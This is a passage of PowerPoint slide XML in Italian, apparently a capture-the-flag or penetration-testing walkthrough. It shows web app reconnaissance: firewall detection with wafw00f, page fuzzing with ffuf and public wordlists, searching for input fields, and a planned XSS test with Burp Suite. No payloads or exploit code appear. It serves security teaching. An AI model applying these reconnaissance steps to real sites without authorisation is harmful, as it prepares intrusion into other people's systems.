            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping</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577738" y="2893475"/>
            <a:ext cx="4425911" cy="3242577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" cap="all">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WAFW00F</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ora ci chiediamo se è presente un firewall all’interno della Web App. A questo punto possiamo utilizzare wafw00f.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>In una prima occhiata non risultano essere presenti firewall e ciò può dare più libertà al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pententester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere, diagramma&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{683F6A2F-EDDD-2C32-5719-52055B822CBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297247" y="2884572"/>
            <a:ext cx="4347696" cy="3251482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378274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3" name="Freeform: Shape 15">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48">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5408027" cy="1442463"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping</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340131"/>
            <a:ext cx="4424633" cy="3791918"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" cap="all">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FFUF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Analizziamo ora tutte le pagine presenti all’interno del sito tramite il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ffuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Per fare ciò però prima dovremo ottenere delle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> o una concatenazione di esse.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> che ho utilizzato si trova presso il sito: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" u="sng">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://wordlists.assetnote.io/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>E già da qui possiamo trovare delle pagine interessanti che saranno necessarie al completamento della sfida.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere, menu&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F73DEB2D-741A-4AAA-E9C4-DAF738A3F6C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7087094" y="1759614"/>
            <a:ext cx="4401655" cy="3345257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328137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 name="Group 15">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9" name="Freeform: Shape 48">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ight Triangle 50">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pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping – analisi manuale</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>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336275" y="725951"/>
            <a:ext cx="5696415" cy="1918215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" cap="all">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ANALISI MANUALE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1700">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ci rechiamo in primis sul sito per vedere la sua struttura e le sue caratteristiche e se sono presenti dei campi di input che possono essere sfruttati. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1700">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Il sito inoltre non espone API sfruttabili.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene schermata, testo, cartone animato, persona&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CAE6608-2461-1D5E-3AE2-C294C01EEE95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2156884" y="2883005"/>
            <a:ext cx="7410000" cy="3260400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99269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 name="Group 16">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927425" cy="1938525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping – analisi manuale</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Triangle 49">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6"/>
            <a:ext cx="4927425" cy="3245931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A questo punto con i risultati ottenuti del fuzzing precedente andiamo a visualizzare le pagine in cerca di campi di input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>I campi di input sono in genere luogo di numerosi attacchi alle Web App in quanto se non opportunamente sanificati possono portare ad attacchi come XSS e SQL Injction.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 10" descr="Script del computer su uno schermo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBAED5C7-0C61-87F9-C65E-B1882746ECD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="2860" r="39839" b="-5"/>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8737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ight Triangle 77">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1169071" y="722904"/>
            <a:ext cx="9821130" cy="1075904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200"/>
              <a:t>Vulnerability mapping – analisi manuale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2" descr="Immagine che contiene testo, vestiti, persona, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5604FF30-4154-B190-7F0C-49825FEC3D1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2412313" y="2884564"/>
            <a:ext cx="7361111" cy="3257291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278237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ight Triangle 77">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1169071" y="722904"/>
            <a:ext cx="9821130" cy="1075904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200"/>
              <a:t>Vulnerability mapping – analisi manuale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2" descr="Immagine che contiene testo, persona, vestiti, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B7BCD53-893A-1E77-2133-F71ED876BFB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2412313" y="2884564"/>
            <a:ext cx="7361111" cy="3257291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="641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614A5768-EA51-48A2-8E17-AE20B9FE02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ED70F1A8-626B-430B-AACC-E280EB946B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9D2887-DD9B-48D0-9844-B5D2024C7E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0C04EA-C56F-4932-AB66-F426CACB4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F894E2-AF43-4E3B-94A7-890F7AD25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C292B8-EA04-4F65-8D17-4954B29EE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26744D-59AC-407B-977F-9F7B79890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FD4FA3-B553-4776-83CC-43156375A0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45C5FE-691A-4620-9B50-AFE8DBB10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E186B6-4496-412B-993D-EBA54ACED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7CCFC45-B62F-4FB2-8A1C-24299AB6A8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E987B3-0DB8-4E10-8F2F-939C9975E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CF3A0F-1366-43D4-B9ED-39506390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370E57-5DAF-4AD1-A44A-32A93556E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38A8C5-7279-4DA9-B1BA-5A76E020C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19694A-5560-4890-99CF-E4B89F5F1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A41929D-D2D8-4211-8E30-449C7F67E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46B496-7BD4-408E-9387-4B2DBD88D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4954B0-8891-4B5C-B5C2-2B098DA9D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E2F714F-4C40-46D7-A9B0-5A41FCE1C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45C2AB-7F9E-4A2B-845D-39DA52F785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540879-E48F-44C9-8978-75F20ECA8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9A807C-71D8-48EB-B90A-18ABEC581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7DBB3B2-0577-449E-822F-EC7F39931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9C75EC-55AD-4526-81DC-A716FD738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C495AC-53AC-46EB-AF18-9F9B7245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76CB3D-FE8C-4CAF-B287-0576A80CC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4B38EE-AF53-4E0C-A55A-A17CC17EF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7DE7212-9D6E-4F4E-A073-5B5B858AF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7C6AD08-49F6-4369-9405-2E06CED9F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E501EB-B771-494E-8AF3-5350560EB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A122D9-8BE6-498E-AB20-311EBD5E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5FB205E9-694A-469E-97E7-7339DE0BC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3591" y="-2841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092891" y="725951"/>
            <a:ext cx="4916971" cy="1442463"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="3700" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3700"/>
              <a:t> mapping – analisi manuale</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092891" y="2340130"/>
            <a:ext cx="4916971" cy="3803271"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>In queste pagine vediamo che è possibile inserire dei campi di testo, quindi saranno prontamente analizzate in seguito. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Andiamo ora a verificare la vulnerabilità rispetto ad attacchi di tipo XSS e lo faremo con Burp Suite. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, software, Sistema operativo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A79F4A-7C85-1F6D-F2F1-73AAE9D2CE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="691078" y="1864648"/>
            <a:ext cx="4412205" cy="3154726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351925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B0791448-355B-4C1D-9B97-A1AB0AB2F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5D756A5B-DD91-4D8A-B1EC-46F0B86002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F50CDE-F313-484A-AB7C-F862FE26A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FA8F74-376C-4762-B237-167629A18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5567C7-8A50-4F63-A7EC-01CC19360A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2C25DF-C3FE-46A5-8293-FD7B03BC89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DC0F4C-BBC6-4254-8F07-D302537C2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0A5FDE-1EC7-4FEC-A25F-87170A82D8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FDFF3C-EFF7-4057-BEA7-BE43ACFB2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5D86CF-5724-4259-8E1C-18CCB0673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E7BE7A-933B-4363-BFE7-F305875CEC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BF8566-73D9-484A-A189-E177A4FA8D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B7E051-E63A-47A0-842F-2571954D0C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2ECD2C-CDB4-493A-AFC4-C78D3DA6A1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5746ACB-FD9B-48D7-80A5-52F4A352F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850B347-E244-48A4-9510-8FEF64A91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C76353-BA7D-4E76-9291-09A30B291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6D6040-E575-4B94-850D-CAB01B81A8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6944DE-6823-451C-8330-78EB29B082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92D707-4002-41EC-856D-853F6ADCB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3D330F-59BD-4DE2-AB29-905966638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38927F-1380-4A6D-9E77-DD2D9252D7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714B6F-A72D-4379-8BBB-3794F81AD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E0BCCB-6EF1-4288-95A1-68AD710D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A832D6-2E07-4D72-A04B-7480E682C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ADC8E9-8992-43C2-B945-AD77249DE5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89E78-3B46-4B87-A8E8-4073D03DF0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470A79-A0DB-4794-872A-BA8CF045DA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625F80-F76B-45E6-92C3-333E2CAC90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0B60DAD-4F3A-4AD8-9AA0-8F355473C1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A9EE7E-7DBD-46BA-BAE4-A7506A9FA9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3F64DCC-C016-48B9-9C29-BE156CCAAD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170167"/>
            <a:ext cx="10325000" cy="1630186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping – analisi manuale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Right Triangle 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CA9ECCC-3CDE-49CD-AC9D-2A856AB0D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99406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028636"/>
            <a:ext cx="10325000" cy="1071605"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1700">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Proviamo ora ad inviare qualcosa nel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> affinché lo possiamo modificare.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1700">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>L’asset ha richiesto che nel campo e-mail ci fosse una e-mail, quindi ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>insieriamo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> una arbitraria.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, vestiti, persona, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA3532A-692F-998D-48BE-6D482601A5BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="13773" b="15593"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="3271957"/>
            <a:ext cx="12205543"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1573582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4"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pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="4100" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4100"/>
              <a:t> mapping – analisi manuale</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pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
